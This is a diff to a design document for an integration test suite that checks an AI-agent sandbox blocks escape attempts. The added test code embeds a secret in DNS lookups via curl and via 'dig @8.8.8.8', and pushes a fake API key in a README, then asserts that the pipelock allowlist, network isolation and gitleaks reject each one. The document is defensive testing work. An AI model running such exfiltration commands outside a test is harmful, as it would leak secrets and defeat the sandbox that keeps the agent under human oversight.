diff --git a/docs/prds/0022-sandbox-escape-integration-test.md b/docs/prds/0022-sandbox-escape-integration-test.md index 2d26c23..591339e 100644 --- a/docs/prds/0022-sandbox-escape-integration-test.md +++ b/docs/prds/0022-sandbox-escape-integration-test.md @@ -276,22 +276,34 @@ def test_3_http_exfil_blocked(self): ) ``` -### Attack-4: DNS exfil via crafted subdomain +### Attack-4: DNS exfil — both crafted subdomain AND direct query + +Two sub-assertions cover the two ways DNS can leak. ```python def test_4_dns_exfil_blocked(self): + # 4a — crafted subdomain that pipelock would resolve. + # Pipelock's exact-match allowlist rejects the host + # before issuing the DNS query. result = self.bottle.exec( 'curl --silent --max-time 5 --fail ' '"https://$TEST_SECRET.api.anthropic.com/"' ) self.assertNotEqual(0, result.returncode) + + # 4b — direct DNS query bypassing pipelock entirely. + # The agent's --internal network has no default + # gateway; even with an explicit resolver like 8.8.8.8 + # the query has nowhere to go. + result = self.bottle.exec( + 'dig +time=3 +tries=1 @8.8.8.8 ' + '"$TEST_SECRET.example.com" || echo "dig exit=$?"' + ) + # No successful answer. + self.assertNotIn("ANSWER SECTION", result.stdout) ``` -Asserts the host wasn't in pipelock's exact-match allowlist -(api.anthropic.com matches `api.anthropic.com`, not -`.api.anthropic.com`). - -### Attack-5: secret in README push +### Attack-5: secret in README push (with ordering check) ```python def test_5_readme_push_blocked(self): @@ -306,12 +318,30 @@ def test_5_readme_push_blocked(self): 'git push origin master' ) self.assertNotEqual(0, result.returncode) - self.assertIn("gitleaks", (result.stderr + result.stdout).lower()) + combined = (result.stderr + result.stdout).lower() + # gitleaks ran and rejected. + self.assertIn("gitleaks", combined) + # AND: the rejection happened BEFORE git-gate tried to + # forward to the unreachable upstream. Network errors + # mentioning resolve / refused / unreachable would mean + # gitleaks ran AFTER (sequence wrong) or didn't run. + for upstream_phrase in ( + "could not resolve", + "connection refused", + "network is unreachable", + "upstream", + ): + self.assertNotIn( + upstream_phrase, combined, + f"unexpected upstream-phase phrase: gitleaks should " + f"reject BEFORE git-gate attempts an upstream push", + ) ``` The `` is templated via the bottle's known identity at -fixture-time. Asserts gitleaks fired (looking for the -literal "gitleaks" in stderr). +fixture-time. The two-part assertion both confirms gitleaks +fired AND that it fired before any upstream attempt — the +ordering the sandbox depends on. ## Implementation chunks @@ -333,7 +363,55 @@ Sized small. it requires the git-gate sidecar configured and the gitleaks rule fired. The "throwaway" upstream URL is intentionally unreachable to keep the test fully - self-contained. + self-contained. Ordering assertions confirm gitleaks + fires before any upstream push attempt. + +6. **CI integration (best-effort).** Add a Gitea Actions + job that runs the suite against the Docker backend. + Marked `continue-on-error: true` so the workflow doesn't + fail if docker-in-docker constraints prevent compose-up. + If the runner shape evolves later (e.g., privileged + Docker socket access) the suite slots in cleanly. + +## Resolved questions + +2. **DNS exfil via the agent's direct DNS resolver.** + Resolved: **add the assertion to test 4.** The + `--internal` network has no default gateway, so a direct + `dig @8.8.8.8 .example.com` from the agent + should fail. Test 4 grows a second assertion: in + addition to the crafted-subdomain-via-pipelock attempt + (which pipelock's exact-match allowlist rejects), the + agent's direct DNS query is also blocked. Both + sub-assertions must pass for test 4 to be green. + +4. **Reachability of throwaway git upstream + gitleaks + ordering.** Resolved: **add ordering assertions to test 5.** + The pre-receive hook MUST reject the push before + git-gate ever attempts to forward to the (unreachable) + upstream. Test 5 asserts: + - `"gitleaks"` appears in the rejection output + (gitleaks fired) + - The rejection output does NOT contain phrases like + `"could not resolve"`, `"connection refused"`, + `"network is unreachable"`, or `"upstream"` — those + would mean gitleaks let the push through and the + failure happened later in the chain. + The second assertion is the "ordering" check — if it + fires, gitleaks ran AFTER the upstream attempt + (sequence is wrong) or didn't run at all. + +5. **CI vs. local-only.** Resolved: **attempt CI; accept + local-only fallback if docker-in-docker blocks it.** + The Gitea Actions runner ecosystem usually has Docker + available to the workflow but not nested Docker + compose inside a containerized runner. v1 tries: add a + CI job that runs the suite against the Docker backend + on a runner with Docker socket access. If the + compose-up step fails because of DiD constraints, the + job is marked `continue-on-error: true` and the suite + stays local-only until we have a runner shape that can + host it. ## Open questions @@ -353,36 +431,12 @@ Sized small. worse than fixing it. But for v1 of this test it's OK to land with `expectedFailure` markers + tickets. -2. **DNS exfil via the agent's direct DNS resolver.** Today - the agent's `--internal` network has no default gateway, - so direct DNS queries to 8.8.8.8 fail. The crafted- - hostname attack rides on pipelock's resolution, which is - what test 4 covers. Should we ALSO test that direct DNS - (e.g., `dig @8.8.8.8 secret.example.com`) is blocked? - Probably yes — adds one assertion to test 4 and confirms - the network isolation is intact. - 3. **Realistic fake secret.** `sk-ant-api03-...` shape is what gitleaks's anthropic-api-key rule matches. Verify the exact regex before settling on the fixture value; wrong-shape secret would mean attack 5 silently passes the wrong way (gitleaks doesn't fire, README ships). -4. **Reachability of throwaway git upstream.** Pointing at - `ssh://git@127.0.0.1:22/throwaway.git` means git-gate - would try (and fail) to push to upstream after gitleaks - passes. We want gitleaks to REJECT before any upstream - attempt — so the push always fails at gitleaks, never - later. Confirm this ordering in git-gate's pre-receive - sequence. - -5. **CI vs. local-only.** The integration test takes ~15s - (compose-up + 5 attacks + teardown). Running it on every - PR pays for itself the first time it catches a sandbox - regression but slows the green-tick feedback for unrelated - PRs. v1 ships as a local-only test; CI integration is a - follow-up that decides whether to gate merges on it. - 6. **Backend-agnostic invocation.** The suite reads `CLAUDE_BOTTLE_BACKEND` so it runs against whatever backend is active. For the smolmachines spike, the